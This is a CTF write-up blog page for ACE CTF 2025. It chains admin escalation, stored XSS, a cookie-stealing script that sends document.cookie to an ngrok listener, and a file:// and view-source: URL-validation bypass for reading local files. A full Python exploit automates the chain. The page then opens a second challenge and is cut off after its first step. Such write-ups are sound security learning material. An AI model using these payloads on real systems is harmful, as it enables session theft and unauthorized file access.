<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>ACE CTF 2025 Writeup | Tanknight</title>
  <meta name="keywords" content=" xss , file-upload , ssrf , arbitrary-file-read ">
  <meta name="description" content="ACE CTF 2025 Writeup | Tanknight">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="A personal blog by Tanknight documenting bug bounty hunting, penetration testing, CTF writeups, vulnerability research, web application security, and technical knowledge sharing.">
<meta property="og:type" content="website">
<meta property="og:title" content="Tags">
<meta property="og:url" content="http://tanknight.blog/tags/index.html">
<meta property="og:site_name" content="Tanknight">
<meta property="og:description" content="A personal blog by Tanknight documenting bug bounty hunting, penetration testing, CTF writeups, vulnerability research, web application security, and technical knowledge sharing.">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2026-07-13T13:35:54.000Z">
<meta property="article:modified_time" content="2026-07-13T13:36:11.689Z">
<meta property="article:author" content="Tanknight">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="bug bounty">
<meta property="article:tag" content="bug bounty hunting">
<meta property="article:tag" content="cybersecurity">
<meta property="article:tag" content="digital forensics">
<meta property="article:tag" content="ethical hacking">
<meta property="article:tag" content="exploit development">
<meta property="article:tag" content="knowledge sharing">
<meta property="article:tag" content="penetration testing">
<meta property="article:tag" content="programming">
<meta property="article:tag" content="reverse engineering">
<meta property="article:tag" content="vulnerability disclosure">
<meta property="article:tag" content="vulnerability research">
<meta property="article:tag" content="web security">
<meta property="article:tag" content="writeups">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-dark.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 8.1.2">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="Tanknight" type="application/atom+xml">
</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>Tanknight</span>
</div>

<div class="icon">
    
        
    
        
            <a title="github"
               href="https://github.com/TanKnight7"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="linkedin"
               href="https://www.linkedin.com/in/michael-stevanus-tanoto/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-linkedin"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="All">All
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="bugbounties">
            
            bugbounties
            
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="certifications">
            
            certifications
            
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="personal">
            
            personal
            
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="writeups">
            
            writeups
            
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="7">
<input type="hidden" id="yelog_site_word_count" value="11.6k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>arbitrary-file-read</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>command-injection</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>csp-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>css-injection</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>dom-clobeering</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>dompurify-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>file-upload</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>idor</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>iframe-sandbox-bypass</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>mass-assignment</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>nginx-misconfig</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>parser-discrepancies</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>path-traversal</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>prototype-pollution</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sandbox-escape</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssti</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>wordpress</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss</a>
            </li>
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a  class="All writeups "
           href="/2026/07/16/Cyber-Jawara-CTF-2025-Writeup/"
           data-tag="xss,css-injection,idor,csp-bypass,prototype-pollution,iframe-sandbox-bypass,dom-clobeering,dompurify-bypass"
           data-author="" >
            <span class="post-title" title="Cyber Jawara CTF 2025 Writeup">Cyber Jawara CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-16 06:51:19">2026/07/16</span>
        </a>
        
        
        <a  class="All personal "
           href="/2026/07/15/How-Cybersecurity-Changed-My-Life/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="How Cybersecurity Changed My Life">How Cybersecurity Changed My Life</span>
            <span class="post-date" title="2026-07-15 12:02:02">2026/07/15</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/14/SCHEMATICSCTF-2025-Writeup/"
           data-tag="command-injection,sandbox-escape,wordpress"
           data-author="" >
            <span class="post-title" title="SCHEMATICS CTF 2025 Writeup">SCHEMATICS CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-14 22:07:50">2026/07/14</span>
        </a>
        
        
        <a  class="All certifications "
           href="/2026/07/14/How-I-Passed-the-OSWE-Exam-in-Under-2-Months/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="How I Passed the OSWE Exam in Under 2 Months">How I Passed the OSWE Exam in Under 2 Months</span>
            <span class="post-date" title="2026-07-14 19:12:05">2026/07/14</span>
        </a>
        
        
        <a  class="All bugbounties "
           href="/2026/07/14/How-I-Got-Three-Nasa-Certificates-Article/"
           data-tag="xss"
           data-author="" >
            <span class="post-title" title="How I Discovered Three Reflected XSS Vulnerabilities and Earned a Spot in NASA’s Hall of Fame">How I Discovered Three Reflected XSS Vulnerabilities and Earned a Spot in NASA’s Hall of Fame</span>
            <span class="post-date" title="2026-07-14 03:57:33">2026/07/14</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/14/ACECTF-2025-Writeup/"
           data-tag="xss,file-upload,ssrf,arbitrary-file-read"
           data-author="" >
            <span class="post-title" title="ACE CTF 2025 Writeup">ACE CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-14 02:30:53">2026/07/14</span>
        </a>
        
        
        <a  class="All writeups "
           href="/2026/07/13/IFEST-2025-CTF-Writeup/"
           data-tag="ssrf,mass-assignment,nginx-misconfig,ssti,command-injection,parser-discrepancies,path-traversal"
           data-author="" >
            <span class="post-title" title="IFEST CTF 2025 Writeup">IFEST CTF 2025 Writeup</span>
            <span class="post-date" title="2026-07-13 22:01:00">2026/07/13</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="Toggle full screen shortcut key s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-ACECTF-2025-Writeup" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">ACE CTF 2025 Writeup</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="writeups">writeups</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color4">xss</a>
            
            <a class="color2">file-upload</a>
            
            <a class="color5">ssrf</a>
            
            <a class="color5">arbitrary-file-read</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            Created At : <time class="date" title='Updated At: 2026-07-14 03:17:13'>2026-07-14 02:30</time>
        
    </div>
    <div class="article-meta">
        
        <span>Count:3.4k</span>
        
        
        <span id="busuanzi_container_page_pv">
            Views 👀 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#ShareIT"><span class="toc-text">ShareIT</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-1-Where-is-the-Flag"><span class="toc-text">Step 1: Where is the Flag?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-2-Privillege-Escallation-to-Admin"><span class="toc-text">Step 2: Privillege Escallation to Admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-3-File-Upload-to-Stored-XSS"><span class="toc-text">Step 3: File Upload to Stored XSS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-4-Get-debug-mode-true-JWT-Token-via-XSS-SSRF"><span class="toc-text">Step 4: Get debug_mode&#x3D;true JWT Token via XSS + SSRF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-5-Local-File-Read"><span class="toc-text">Step 5: Local File Read</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-6-Directory-Listing-via-View-source-Protocol"><span class="toc-text">Step 6: Directory Listing via View-source Protocol</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Velixs-com-PCS"><span class="toc-text">Velixs.com - PCS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-1-Finding-the-Flag-Location"><span class="toc-text">Step 1: Finding the Flag Location</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-2-Huh-A-Bot-Could-it-Be-XSS"><span class="toc-text">Step 2: Huh? A Bot?? Could it Be XSS??</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-3-Blind-XSS"><span class="toc-text">Step 3: Blind XSS</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Step-4-Blind-XSS-to-PHP-File-Upload-to-RCE"><span class="toc-text">Step 4: Blind XSS to PHP File Upload to RCE</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="ShareIT"><a href="#ShareIT" class="headerlink" title="ShareIT"></a>ShareIT</h1><h2 id="Step-1-Where-is-the-Flag"><a href="#Step-1-Where-is-the-Flag" class="headerlink" title="Step 1: Where is the Flag?"></a>Step 1: Where is the Flag?</h2><p>Looking at the provided files, the location of the flag was completely unknown—whether it was stored in a file or a variable, it literally wasn’t there. So I asked the challenge author, and it turned out the flag is located in the root directory (<code>/</code>) with the filename <code>&lt;random_str&gt;.txt</code>.</p>
<h2 id="Step-2-Privillege-Escallation-to-Admin"><a href="#Step-2-Privillege-Escallation-to-Admin" class="headerlink" title="Step 2: Privillege Escallation to Admin"></a>Step 2: Privillege Escallation to Admin</h2><p>Register at <code>/api/auth/register</code><br><img src="/images/ACECTF-2025-Writeup.png"></p>
<p>Login at <code>/api/auth/login</code><br><img src="/images/ACECTF-2025-Writeup-1.png"></p>
<p>Analysis:<br>In the <code>register</code> function, data from <code>req.body</code> is directly pushed to the <code>users</code> array. As it turns out, there is no proper validation there, so if we send a payload like <code>{" email": "admin"}</code> (notice the leading space in the key), it still gets pushed into the array without further checks.</p>
<pre><code class="language-ts">static async register(req: Request, res: Response) {
	const { email, password } = req.body;
	if (!email || !password) {
		return res.status(400).json({ message: 'Email and password are
		required' });
	}
	if (AuthHandler.users.some((u) =&gt; u.email === email)) {
		return res.status(409).json({ message: 'Email already registered'});
	}
	AuthHandler.users.push(req.body);
	return res.status(201).json({ message: 'Registration successful'});
}
</code></pre>
<p>Moving on to the <code>login</code> function: here, it loops through every user data entry and checks the <code>email</code> and <code>password</code> fields. But uniquely, before checking, all keys are <code>trim()</code>ed. Meaning, if there is a key <code>" email"</code> (with a leading space), it will become <code>"email"</code> when checked.</p>
<p>Because we previously succeeded in inserting the data <code>{" email": "admin"}</code>, during the login process, the <code>" email"</code> key will be trimmed to <code>"email"</code>, and its value will be captured as <code>"admin"</code>. The system assumes we are logging in as admin and ultimately grants us a JWT token with the admin role.</p>
<pre><code class="language-ts">static async login(req: Request, res: Response) {
    const { email, password } = req.body;

    const user = [...AuthHandler.users].reverse().find((u) =&gt; u.email === email);
    if (!user || user.password !== password) {
        return res.status(401).json({ message: 'Invalid email or password' });
    }
    
    const adminEmails = AuthHandler.admins.map((a) =&gt; a.email);
    const { password: _, ...userData } = user;
    
    for (const key in userData) {
        if (userData.hasOwnProperty(key)) {
            const keyClean = key.trim();
            if (keyClean.includes('email')) {
                const value = userData[key as keyof typeof userData];
                if (!value) continue;
                if (typeof value === 'boolean') continue;
                if (adminEmails.includes(value.trim())) {
                    const token = jwt.sign({ email, admin: true }, secret_key, {
                        expiresIn: '1h',
                    });
                    res.setHeader('Authorization', `Bearer ${token}`);
                    return res.status(200).json({ user: user, token: token });
                }
            }
        }
    }
    
    const token = jwt.sign({ email, admin: false }, secret_key, {
        expiresIn: '1h',
    });
    res.setHeader('Authorization', `Bearer ${token}`);
    return res.status(200).json({ user: user, token: token });
}
</code></pre>
<h2 id="Step-3-File-Upload-to-Stored-XSS"><a href="#Step-3-File-Upload-to-Stored-XSS" class="headerlink" title="Step 3: File Upload to Stored XSS"></a>Step 3: File Upload to Stored XSS</h2><p>The <code>/api/upload</code> endpoint can only be accessed if we have a JWT token with the admin role. Since we already succeeded in obtaining an admin JWT token, we have full access to this feature.</p>
<p>The issue here is that the <code>upload</code> function does not perform any extension validation on the uploaded file. Consequently, we are free to upload any file type, including <code>.html</code> files. If we upload <code>xss.html</code>, for example, the file will be saved directly and made publicly accessible at <code>/uploads/xss.html</code>.</p>
<p>The result? Stored XSS.</p>
<pre><code class="language-ts">static async Png(req: JWTRequest, res: Response) {
    if (!req.auth) {
        return res.status(401).json({ message: 'Unauthorized' });
    }
    if (!req.auth.admin) {
        return res.status(403).json({ message: 'Forbidden' });
    }
    if (!req.validatedFiles) {
        return res.status(400).json({ status: 'error', message: 'File is required' });
    }

    const fileName = Math.random().toString(36).substring(2, 15) + Math.random().toString(36).substring(2, 15);
    const fileExtension = req.validatedFiles[0].originalname.split('.').pop();
    const fullFileName = fileName + '.' + fileExtension;
    
    fs.writeFileSync('./uploads/' + fullFileName, req.validatedFiles[0].buffer);
    return res.status(200).json({ message: fullFileName });
}
</code></pre>
<h2 id="Step-4-Get-debug-mode-true-JWT-Token-via-XSS-SSRF"><a href="#Step-4-Get-debug-mode-true-JWT-Token-via-XSS-SSRF" class="headerlink" title="Step 4: Get debug_mode=true JWT Token via XSS + SSRF"></a>Step 4: Get debug_mode=true JWT Token via XSS + SSRF</h2><p>At the <code>/api/auth/init</code> endpoint, we can obtain a JWT token that has <code>debug_mode: true</code>. However, this token is only granted if the entity accessing the endpoint is recognized as a “local user”.</p>
<p>Since we found a stored XSS vulnerability and the bot executes actions as a local user, we can force the bot to access <code>/api/auth/init</code>. As a result, the bot will receive a user cookie containing a JWT token with <code>debug_mode: true</code>. From there, we just need to exfiltrate that cookie via XSS back to our own server.</p>
<pre><code class="language-js">static async init(req: Request, res: Response) {
    let email = 'initdbg';
    let dbg = false;
    const parsedLocaladdr = req.socket.localAddress?.replace(/::ffff:/, '') || '';
    const parsedRemoteaddr = req.socket.remoteAddress?.replace(/::ffff:/, '') || '';
    
    if (!parsedRemoteaddr) {
        return res.status(400).json({ message: 'Invalid remote address' });
    }
    
    var isLocal = parsedLocaladdr === parsedRemoteaddr || parsedRemoteaddr === '::1' || isPrivateIP(parsedRemoteaddr);
    
    if (req.headers.authorization &amp;&amp; isLocal) {
        const token = req.headers.authorization.split(' ')[1];
        const decoded = jwt.verify(token, secret_key);
        if (decoded) {
            const user = jwt.decode(token) as User;
            dbg = true;
            email = user.email;
        }
    }
    
    console.log(
        'debugging mode:', dbg,
        'email:', email,
        'localAddress:', parsedLocaladdr,
        'remoteAddress:', parsedRemoteaddr
    );
    
    res.cookie(
        'user',
        jwt.sign({ email: email, admin: false, debug_mode: dbg }, secret_key, { expiresIn: '1h' })
    );
    res.status(200).json({ message: 'Auth system initialized' });
}
</code></pre>
<p>Here is the XSS script payload:</p>
<pre><code class="language-html">&lt;script&gt;
(async () =&gt; {
    // Trigger the endpoint to set the cookie
    await open("/api/auth/init");
    // Delay for 2 seconds to ensure processing completes
    await new Promise((resolve) =&gt; setTimeout(resolve, 2000));
    // Exfiltrate the cookie to the attacker's server
    await fetch(`${public_url}/getCookie?${document.cookie}`);
})();
&lt;/script&gt;
</code></pre>
<p><strong>Why use <code>open("/api/auth/init")</code> instead of a direct <code>fetch("/api/auth/init")</code>?</strong></p>
<p>The server checks the <code>Sec-Fetch-Mode</code> header. If we use <code>fetch()</code>, the browser automatically sets <code>Sec-Fetch-Mode: cors</code>, causing the server to block the request. However, using <code>open()</code> forces the browser to open a new context, changing the header to <code>Sec-Fetch-Mode: navigate</code>. The server considers this valid, allowing us to bypass the protection and successfully obtain the <code>debug_mode: true</code> cookie.</p>
<pre><code class="language-js">app.use((req, res, next) =&gt; {
    const secFetchMode = req.get("Sec-Fetch-Mode");
    if (secFetchMode &amp;&amp; secFetchMode !== "navigate") {
        return res
            .status(403)
            .send("Blocked: Please navigate on your own. This is an API for unit testing.");
    }
    next();
});
</code></pre>
<h2 id="Step-5-Local-File-Read"><a href="#Step-5-Local-File-Read" class="headerlink" title="Step 5: Local File Read"></a>Step 5: Local File Read</h2><p>Access to the <code>/api/runtest</code> endpoint is restricted to admins, and this validation is verified using the JWT token supplied in the <code>Authorization</code> header.</p>
<p>Curiously, this endpoint also performs an additional check for <code>debug_mode</code>. Instead of extracting <code>debug_mode</code> from the <code>Authorization</code> header, it extracts it from the <code>user</code> cookie. If the cookie doesn’t exist, it falls back to the JWT in the header.</p>
<p>This means two distinct JWT sources are processed here:</p>
<ol>
<li><strong>Authorization Header:</strong> Verifies if we possess the admin role.</li>
<li><strong>User Cookie:</strong> Verifies if <code>debug_mode</code> is set to <code>true</code>.</li>
</ol>
<p>As a result, we can supply two different tokens simultaneously: an admin token in the header, and a <code>debug_mode: true</code> token within the cookie. This combination grants us admin status while enabling debug mode at the same time.</p>
<pre><code class="language-js">app.post("/api/runtest", jwtMiddleware, async (req: JWTRequest, res: Response) =&gt; {
    if (!req.auth) {
        return res.status(401).json({ message: "Unauthorized" });
    }
    if (!req.auth.admin) {
        return res.status(403).json({ message: "Forbidden" });
    }
    
    const url = req.body.url as string;
    const timeout = (req.body.timeout as number) || 0;
    
    if (timeout &gt; 5000) {
        return res.status(400).json({ message: "Timeout is too long" });
    }
    if (!url) {
        return res.status(400).json({ message: "URL is required" });
    }
    if (url.length &gt; 60) {
        console.log("URL is too long");
        return res.status(400).json({ message: "URL is too long" });
    }
    
    const urlP = new URL(url);
    if (!url.includes("http://localhost")) {
        return res.status(400).json({ message: "URL must be localhost" });
    }
    
    const context = await browserCtx();
    await context.setExtraHTTPHeaders({
        Authorization: req.headers.authorization || "",
    });
    
    const user = jwt.decode(req.cookies.user || req.headers.authorization!.split(" ")[1]) as User;
    const page = await context.newPage();
    
    try {
        if (!user.debug_mode) {
            if (urlP.hostname) {
                if (!["localhost", "127.0.0.1"].includes(urlP.hostname)) {
                    return res.status(400).json({ message: "URL must be localhost" });
                }
            }
            const response = await page.goto(url, {
                waitUntil: "load",
                timeout: timeout,
            });
            if (!response) {
                throw new Error("No response received");
            }
            console.log(await page.content());
        }
        
        if (user.debug_mode) {
            if (urlP.hostname) {
                if (!["localhost", "127.0.0.1"].includes(urlP.hostname)) {
                    return res.status(400).json({ message: "URL must be localhost" });
                }
            }
            console.info("Debug mode is enabled, skipping page.goto for URL:", url);
            await page.goto(url, {
                waitUntil: "load",
                timeout: timeout,
            });
            const content = await page.content();
            if (!content) {
                throw new Error("No response received from page.goto");
            }
            console.log(content);
            AuthHandler.users.push({
                email: user.email,
                password: "dbgpass1234",
                debug_mode: false,
                log: content,
            });
        }
    } catch (error) {
        console.error("Error during page navigation:", error);
        return res.status(500).json({ message: "Internal Server Error" });
    } finally {
        await page.waitForTimeout(timeout);
        await page.close();
        await context.close();
    }
    res.status(200).json({ message: "unit test success" });
});
</code></pre>
<p>Armed with both tokens, we can abuse the <code>/api/runtest</code> endpoint to read arbitrary local files from the bot’s system. To do this, we must first bypass the URL validation layers.</p>
<p>The application uses two layers of verification to ensure the URL points to localhost:</p>
<pre><code class="language-ts">if (!url.includes("http://localhost")) {
    return res.status(400).json({ message: "URL must be localhost" });
}
</code></pre>
<blockquote>
<p>This block only checks for the literal string <code>"http://localhost"</code> anywhere within the URL structure. We can bypass this check using a URL fragment scheme: <code>file:///etc/passwd#http://localhost</code>.</p>
</blockquote>
<p>Next, the second validation layer checks the parsed hostname:</p>
<pre><code class="language-js">const urlP = new URL(url);
if (urlP.hostname) {
    if (!["localhost", "127.0.0.1"].includes(urlP.hostname)) {
        return res.status(400).json({ message: "URL must be localhost" });
    }
}
</code></pre>
<p>Because we are passing the payload <code>file:///etc/passwd#http://localhost</code>, the <code>urlP.hostname</code> resolves to an empty string (since the <code>file://</code> scheme does not utilize a traditional hostname component). As a result, this second validation block is skipped entirely.</p>
<p><img src="/images/ACECTF-2025-Writeup-2.png"></p>
<p>Consequently, the bot executes:</p>
<pre><code class="language-js">await page.goto("file:///etc/passwd#http://localhost")
</code></pre>
<p>The contents of <code>/etc/passwd</code> will be read by the bot and appended directly to the array:</p>
<pre><code class="language-js">AuthHandler.users.push({
    email: user.email,
    password: "dbgpass1234",
    debug_mode: false,
    log: content, // &lt;- The contents of /etc/passwd are saved here
});
</code></pre>
<p>We can subsequently review the output logs simply by logging back into our account using our email address and the password <code>dbgpass1234</code>.<br><img src="/images/ACECTF-2025-Writeup-3.png"></p>
<h2 id="Step-6-Directory-Listing-via-View-source-Protocol"><a href="#Step-6-Directory-Listing-via-View-source-Protocol" class="headerlink" title="Step 6: Directory Listing via View-source Protocol"></a>Step 6: Directory Listing via View-source Protocol</h2><p>While we can read local files via the <code>file://</code> scheme, the actual flag filename is completely randomized. Guessing it blindly would be virtually impossible.</p>
<p>However, research into headless browser file-read vectors revealed an intriguing trick regarding the behavior of the <code>view-source:</code> protocol (reference: <a target="_blank" rel="noopener" href="https://medium.com/@woff/arbitrary-file-read-tricks-with-headless-browsers-eeebc2d9e5c8">Arbitrary File Read Tricks with Headless Browsers</a>).</p>
<p>In headless instances, referencing <code>view-source:file:///</code> forces the engine to render the directory structure of the filesystem root path (<code>/</code>).</p>
<p>Windows environment behavior example:</p>
<p><img src="/images/ACECTF-2025-Writeup-4.png"></p>
<p>By targeting the root directory using the payload <code>view-source:file:///#http://localhost</code>, we can list the directory structure:</p>
<p><img src="/images/ACECTF-2025-Writeup-5.png"><br>The random flag filename is revealed as <code>9acgk8zwv043cvnhy.txt</code>.</p>
<p>Finally, we read the target file contents by sending the payload <code>view-source:file:///9acgk8zwv043cvnhy.txt#http://localhost</code>:<br><img src="/images/ACECTF-2025-Writeup-6.png"></p>
<p>The flag is successfully retrieved!</p>
<pre><code class="language-python">import requests
import string
import random
from flask import Flask, request
import time

# ====== CHANGE ME ======
URL = "http://117.53.46.98:3000"
public_url = "http://6.tcp.ngrok.io:16734"
PORT = 9999
# ====== CHANGE ME ======

def rand_str(k=8):
    return ''.join(random.choices(string.ascii_letters, k=k))

app = Flask(__name__)
x = requests.Session()
DEBUG_MODE_COOKIE = ""

def register_admin(email, password):
    data = {
        "email": email,
        " email": "admin",
        "password": password,
    }
    res = x.post(URL + "/api/auth/register", json=data)
    print(f"[X] Register account: {res.text}")

def login(email, password):
    data = {
        "email": email,
        " email": "admin",
        "password": password
    }
    res = x.post(URL + "/api/auth/login", json=data)
    body = res.json()
    print(f"[X] Login account: {body}")
    return body.get('token')

def upload_file(headers):
    payload = f'''&lt;script&gt;
    (async() =&gt; {{
        await open('/api/auth/init');
        await (new Promise(resolve =&gt; setTimeout(resolve, 2000)));
        await fetch(`{public_url}/getCookie?${{document.cookie}}`);
    }})();
    &lt;/script&gt;'''
    
    files = {
        'files': ('test.html', payload, 'image/png')
    }
    res = x.post(URL + "/api/upload", files=files, headers=headers)
    print(f"[X] File uploaded: {res.text}")
    return res.json().get('message')

def runtest(url, headers, cookies=None):
    if cookies is None:
        cookies = {}
    data = {
        'url': url,
        "timeout": 5000
    }
    res = x.post(URL + "/api/runtest", headers=headers, json=data, cookies=cookies)
    print(f"Running test: {res.text}")

@app.route('/getCookie')
def getCookie():
    global DEBUG_MODE_COOKIE
    DEBUG_MODE_COOKIE = request.args.get('user')
    return "nice!", 200

@app.route('/exploit')
def exploit():
    global DEBUG_MODE_COOKIE
    email, password = f"user_{rand_str()}@gmail.com", "password123"
    
    register_admin(email, password)
    token = login(email, password)
    headers = {
        'Authorization': f'Bearer {token}'
    }
    
    file = upload_file(headers)
    runtest(f'http://localhost:3000/{file}', headers)
    time.sleep(5)
    
    # List root directory to find the random flag filename
    runtest('view-source:file:///#http://localhost', headers, {'user': DEBUG_MODE_COOKIE})
    
    # Read the specific flag file
    runtest('view-source:file:///9acgk8zwv043cvnhy.txt#http://localhost', headers, {'user': DEBUG_MODE_COOKIE})
    
    # Authenticate to retrieve the logs filled by the debug exploit
    login(email, "dbgpass1234")
    return "done.", 200

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=PORT, debug=True)
</code></pre>
<h1 id="Velixs-com-PCS"><a href="#Velixs-com-PCS" class="headerlink" title="Velixs.com - PCS"></a>Velixs.com - PCS</h1><h2 id="Step-1-Finding-the-Flag-Location"><a href="#Step-1-Finding-the-Flag-Location" class="headerlink" title="Step 1: Finding the Flag Location"></a>Step 1: Finding the Flag Location</h2><p>We were given a MASSIVE amount of source code…<br><img src="/../images/ACECTF-2025-Writeup-7.png"><br>Essentially, the flag is located in a file with a completely randomized name.</p>
